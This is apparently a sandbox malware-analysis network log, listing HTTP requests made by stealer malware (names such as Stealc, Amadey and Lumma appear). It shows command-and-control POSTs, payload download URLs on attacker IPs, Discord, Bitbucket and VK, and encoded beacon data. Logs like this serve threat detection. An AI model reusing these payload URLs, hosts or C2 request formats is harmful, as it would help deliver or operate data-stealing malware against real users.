Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGDHost: 85.28.47.4Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 64 66 35 35 65 36 30 39 32 62 64 64 38 62 37 37 62 34 34 61 37 38 37 30 63 39 66 36 65 62 36 32 37 61 38 63 39 39 37 63 30 37 30 35 32 65 35 37 31 62 36 34 34 37 39 30 61 63 32 38 31 64 37 30 66 31 37 36 64 64 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 2d 2d 0d 0a Data Ascii: ------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="token"a4df55e6092bdd8b77b44a7870c9f6eb627a8c997c07052e571b644790ac281d70f176dd------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="message"jbdtaijovg------FCAAEBFHJJDAAKFIECGD--
Source: global traffic	HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 36 32 45 37 36 42 38 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B62E76B85082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 30 30 30 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1000006001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /clrls/cl_rls.json HTTP/1.1Host: www.rapidfilestorage.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /clrls/cl_rls.json HTTP/1.1Host: www.rapidfilestorage.comConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View	IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View	IP Address: 104.26.9.59 104.26.9.59

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: api.myip.com
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: iplogger.org

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: api.myip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /ssl/crt.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: lop.foxesjoy.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /attachments/1255737669737254954/1257455463088394404/setup.exe?ex=66847828&is=668326a8&hm=9a0a6baa5ff045d491afd87efad3dd033618cc8c5ce04018ccc10ef67b97fd67& HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /sdgdf/fbghhj/downloads/streamer.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: bitbucket.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /385137/setup.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: monoblocked.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /bc2514d8-2277-4dd3-a4e2-b5b0ed90570d/downloads/67e8095f-ddaa-4765-8f3a-5f79b5cf66c0/streamer.exe?response-content-disposition=attachment%3B%20filename%3D%22streamer.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHVJXWTXU&Signature=6x0j3jCqJIu9ecs3s6GtlhgLnsU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEK7%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJIMEYCIQD%2F2aNgvwR%2BzDTfk81ofa8RoMfgWY6HIHaPq6AVG5xEYAIhAJqDf3iSPie3cXsxWWnwnW8qwgK1Tac0vhv18BHJA7wsKqcCCGcQABoMOTg0NTI1MTAxMTQ2Igy8ya024r6DMXH4P4YqhAKQSomtAk%2FsqiXI2%2F3voOa7hrDvFCv9VrBtu1RIEm99MXJW7beO%2B2HqROhFQwyiH1W0FURY0nM66e6QQ1eshMPl6wuVF8aiDYVv80BaYrRUqqJbDBjHH6k2n7jlWpH4Tw1PMrRevf3ArvGyd9YcCfmAztez9uMctNQcfdK%2B8C3P%2FvVm04c%2BdJIDwxu6FMQq0TfQQoxa0hMkgxUcRdDJDFaLcnb6%2FG1Ej0KO3weudMoHZi%2FdazhGjoi%2BHAWbwlw8Vukp%2By8rtl0d%2B9YEZcfdwG6I0BtVaPDwyCTzPkXRYOFTrSdaG3zEncRQV%2FIvZhapXMg7J0ybYPS4gtKqOeLxnOmxMoOBwDDezIy0BjqcAU3U3hMrRgYyxiW6p641c%2FfbR5vglkKAfISIMwmD%2BNVhIbYo1lGxIuF0WNeBoNFVKIQ2SulUFhK2Nlg%2Ftsqf4kdPsqUD5oMW%2FuS6%2BrpQIaXGoZFElhRLRAMZFHDYRHsXbuRsAhBsBkYAT%2BIEkb3xhUStn5Xxdeh5Qm7xW4eE%2B2zdY%2B0yA6TA5cBngIMSLG3vA9TKHy64VDpvVyKfOg%3D%3D&Expires=1719872870 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/1255737669737254954/1257455463088394404/setup.exe?ex=66847828&is=668326a8&hm=9a0a6baa5ff045d491afd87efad3dd033618cc8c5ce04018ccc10ef67b97fd67& HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: cdn.discordapp.comConnection: Keep-AliveCookie: __cf_bm=ex.7TgCY468wc5yu3YRkEsGRG9qmHn86dcAYyaJ385w-1719871508-1.0.1.1-5hdHtN2CIlAZ3ndgxjU1QFbaLT0pT5n.uDcbnhaYWTdTD8z4UsNVmuHyiV0JqEgrvJtmikuVD.LZq.kf7BpweA; _cfuvid=tIsBmNXiVts2Ahh4K2Kvba0M8lkel4q.Jz3q1r9HKzs-1719871508397-0.0.1.1-604800000
Source: global traffic	HTTP traffic detected: GET /385137/setup.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: a.884736279.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc851967711_678869252?hash=7enX4Yf9Eh9a580ka8ZSEsnG3OhzAssallq1mEISP3P&dl=j8nlfPwylDCi59wUX6tJ9uBa1hYeg1sJKQmMIBqlpjL&api=1&no_preview=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doc461844031_680356434?hash=KmXLjZzwyKBjmzxff0Jo9U1YwRL71yZftAbVL5kdyKD&dl=3v6LT2A7IS0PX4HrE4vRkDm0d4mbocnTvyEbLzKxGUP&api=1&no_preview=1#def_meta HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doc5294803_669843349?hash=9zPjskz2rlw4WpxESbjigfNghvMBCG7BIpLthkH7eKs&dl=usJOnLsECNfeEiGdn2IU9JTEdwqaRFTDnZMFQJn7v9z&api=1&no_preview=1#ww11 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c237031/u851967711/docs/d44/57796f4397b6/BotClient.bmp?extra=Uo921g-adSvvTWhdB6yDb5HdFI5_X3VJlRVmHM-Bh6mJlvI7hkGi94eW7KfU-ssLh3GfPV8Ees6kZM0RD1upQfkxRtTtcM3LgknqFomcBUvMb567aPkC4b-b3Csz0akrGpBI454GBQIw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-23.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc851967711_678965991?hash=15v5bIC0BdxsDWrpl71N2Lf9ztIhZN508DquMzIAGCz&dl=yDzL4lhSc6Qh08VS3lx8KlKwYrkSiYGlwvhnSbB1cMD&api=1&no_preview=1#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c235031/u851967711/docs/d58/101acf609709/crypted.bmp?extra=Ux3hmN1iPre6dOlOSIWGtqFvEkIdvKeIAUWi6lAsDtS-lf2EKyAeU1NTXtXwHQmiuKqNE3-DjYe0f5mcu6SGTNHoKn8lJaXQr06BHIPY-Yp_iz6-eS16TocDohevBfPa-7a9dirBWiks HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-22.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc851967711_678909859?hash=lNew8DPFlC3FkyFwDvSRD3AUel2qUbt8XwQ47izbny0&dl=VoWAeLPwa3VHUZ6RGMrmgXoJxs6sK0ufCNL8HdLsSa4&api=1&no_preview=1#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cacheCookie: remixlang=3; remixstlid=9092944805461463727_DtkQ3CUIobNM2Gxry3e19bgTzz0nGnqrsykLnhHF59z; remixlgck=374e8ec07457a99dc7; remixstid=242356419_2xqWAu8IaSk4k7yzGaEqYJBhxAcSZqxhFf8GwzSXfco; remixir=1
Source: global traffic	HTTP traffic detected: GET /c235031/u851967711/docs/d19/e642d2d3ea8a/File.bmp?extra=codZE4oOkF_mb0aHMW2_KJkLotDgGHzpcd-JeGF88YLnbk2Qm4WcZoXVvzJ1HuH2HaOhqgSp6_uV0Z6TCfxUYwreX5Rq2H_XmfQYz82S4_LBrsYcRulTXC2HKGtLY-ovV1tbmUk3ivmp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-21.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1nhuM4.js HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplogger.org
Source: global traffic	HTTP traffic detected: GET /api/crazyfish.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.99.177
Source: global traffic	HTTP traffic detected: POST /api/twofish.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 133Host: 5.42.99.177
Source: global traffic	HTTP traffic detected: HEAD /download/th/space.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 77.105.133.27Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /d/525403 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 80.78.242.100Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /download/123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 77.105.133.27Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /riana/super.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 77.91.77.80Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download/123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 77.105.133.27Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download/th/space.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 77.105.133.27Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /riana/super.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 77.91.77.80Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d/525403 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 80.78.242.100Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/twofish.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 517Host: 5.42.99.177
Source: global traffic	HTTP traffic detected: GET /lumma2806.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:129.0) Gecko/20100101 Firefox/129.0Host: 77.105.132.27Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIJDHIDBGHJKECBFIIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:129.0) Gecko/20100101 Firefox/129.0Host: tea.arpdabl.orgContent-Length: 3493Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /updates/yd/yt_wrtzr_1/win/version.txt?BAxskCrAzBkAQLhyBAyQiyrSwfaJVtVcO HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.rapidfilestorage.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/yt_wrtzr_1/win/version.txt?BaGHTJrEOqpSoOUUbPmVVgUlkCFxoVbnT HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: helsinki-dtc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/yt_wrtzr_1/win/version.txt?PFusrYpNtPDdGjvKoKGcbouLSvYzMzgzu HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: skrptfiles.tracemonitors.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt?lkNOHJiXnxKRAffVlKrZwoIEmkviEhCxR HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.rapidfilestorage.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt?ZOmFPgPUTVZNbWpVqvSvPLQtsthTrEhbx HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: helsinki-dtc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt?FJSFGEosnJwNZSTgJVMlBADdAGOvxPznz HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: skrptfiles.tracemonitors.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/yt_wrtzr_1/win/version.txt?lfKppfDaSKtbiZoZrqLvfigDaXuNMaIUn HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.rapidfilestorage.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/yt_wrtzr_1/win/version.txt?BsbCNQNrlQruMiRbNuFhJgcZknRTSMCKj HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: helsinki-dtc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/yt_wrtzr_1/win/version.txt?nWWigaXNQYYJICpsdMZSxscisfoqitXJL HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: skrptfiles.tracemonitors.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/yt_wrtzr_1/win/version.txt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: www.rapidfilestorage.com
Source: global traffic	HTTP traffic detected: POST /api2/google_api_ifi HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/0 Safari/537.36Host: api2.check-data.xyzContent-Length: 722Connection: Keep-AliveCache-Control: no-cacheData Raw: 6b 3d 4d 4a 33 56 42 49 38 6f 5a 31 49 56 34 46 6b 31 73 6e 7a 36 51 44 6e 26 72 3d 4c 46 53 56 37 4d 46 53 56 33 4b 46 53 56 35 5a 45 53 56 39 48 46 53 56 37 26 67 3d 4e 44 53 56 36 5a 45 53 56 32 4b 46 53 56 33 49 46 53 56 39 4a 46 53 56 31 59 45 53 56 34 48 46 53 56 30 4e 46 53 56 30 4e 45 53 56 34 4c 46 53 56 39 4f 44 53 56 35 4c 44 53 56 33 4e 46 53 56 35 4e 45 53 56 30 4b 46 53 56 34 5a 45 53 56 31 4b 46 53 56 35 50 44 53 56 34 4e 45 53 56 37 59 45 53 56 39 4e 46 53 56 37 50 44 53 56 35 4b 46 53 56 37 4e 45 53 56 36 48 46 53 56 30 48 46 53 56 38 48 46 53 56 32 51 44 53 56 39 48 46 53 56 38 4d 44 53 56 31 4b 46 53 56 37 5a 45 53 56 31 4c 44 53 56 35 48 46 53 56 32 51 44 53 56 31 4f 44 53 56 37 26 76 3d 49 46 53 56 30 4f 45 53 56 39 47 46 53 56 32 4f 45 53 56 36 47 46 53 56 30 4f 45 53 56 35 4a 46 53 56 38 48 46 53 56 37 5a 45 53 56 39 59 45 53 56 31 26 63 3d 4e 43 53 56 36 59 43 53 56 31 5a 44 53 56 30 42 44 53 56 36 57 43 53 56 37 59 43 53 56 39 4f 43 53 56 38 57 43 53 56 33 5a 44 53 56 31 48 46 53 56 31 26 75 3d 49 46 53 56 32 4a 46 53 56 30 48 46 53 56 34 4e 44 53 56 39 4e 46 53 56 34 4b 46 53 56 31 4f 44 53 56 38 4c 46 53 56 33 4b 46 53 56 39 4d 44 53 56 34 4f 44 53 56 33 4d 46 53 56 39 4b 46 53 56 38 4f 44 53 56 31 4c 44 53 56 37 48 46 53 56 35 4d 44 53 56 33 48 46 53 56 37 4e 46 53 56 38 51 44 53 56 37 4d 44 53 56 38 47 46 53 56 30 51 44 53 56 39 4c 46 53 56 34 5a 45 53 56 33 59 45 53 56 33 59 45 53 56 33 59 45 53 56 33 4f 44 53 56 35 4a 46 53 56 37 48 46 53 56 33 4d 44 53 56 31 26 72 67 3d 5a 45 53 56 38 4d 46 53 56 30 48 46 53 56 36 49 46 53 56 34 59 45 53 56 36 4d 44 53 56 30 4b 46 53 56 33 59 45 53 56 31 4e 45 53 56 33 4e 44 53 56 36 47 46 53 56 30 51 44 53 56 34 47 46 53 56 36 4e 45 53 56 36 47 46 53 56 36 48 46 53 56 34 48 46 53 56 35 4c 44 53 56 32 4e 45 53 56 32 4c 46 53 56 32 49 46 53 56 31 4e 46 53 56 36 49 46 53 56 33 4e 45 53 56 36 59 45 53 56 34 4b 46 53 56 38 4c 46 53 56 33 49 46 53 56 37 49 46 53 56 30 50 44 53 56 34 4d 46 53 56 37 5a 45 53 56 30 4b 46 53 56 32 4b 46 53 56 39 50 44 53 56 37 4d 44 53 56 30 26 77 3d 4c 46 53 56 32 49 46 53 56 31 4c 46 53 56 36 4b 46 53 56 33 47 46 53 56 37 4a 46 53 56 39 Data Ascii: k=MJ3VBI8oZ1IV4Fk1snz6QDn&r=LFSV7MFSV3KFSV5ZESV9HFSV7&g=NDSV6ZESV2KFSV3IFSV9JFSV1YESV4HFSV0NFSV0NESV4LFSV9ODSV5LDSV3NFSV5NESV0KFSV4ZESV1KFSV5PDSV4NESV7YESV9NFSV7PDSV5KFSV7NESV6HFSV0HFSV8HFSV2QDSV9HFSV8MDSV1KFSV7ZESV1LDSV5HFSV2QDSV1ODSV7&v=IFSV0OESV9GFSV2OESV6GFSV0OESV5JFSV8HFSV7ZESV9YESV1&c=NCSV6YCSV1ZDSV0BDSV6WCSV7YCSV9OCSV8WCSV3ZDSV1HFSV1&u=IFSV2JFSV0HFSV4NDSV9NFSV4KFSV1ODSV8LFSV3KFSV9MDSV4ODSV3MFSV9KFSV8ODSV1LDSV7HFSV5MDSV3HFSV7NFSV8QDSV7MDSV8GFSV0QDSV9LFSV4ZESV3YESV3YESV3YESV3ODSV5JFSV7HFSV3MDSV1&rg=ZESV8MF
Source: global traffic	HTTP traffic detected: GET /updates/yd/yt_wrtzr_1/win/version.txt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: helsinki-dtc.com
Source: global traffic	HTTP traffic detected: GET /updates/yd/yt_wrtzr_1/win/version.txt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: skrptfiles.tracemonitors.com
Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt?lVCwnpMUrdtQuoonAEIPdNPTEKYCDRfxr HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.rapidfilestorage.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt?uKnuZolhihzrwcGciuiXPYJRFqygVFjtF HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: helsinki-dtc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt?UpPMoHiZGixvnmLTDXgCACmDdHoeBzWlB HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: skrptfiles.tracemonitors.comConnection: Keep-Alive
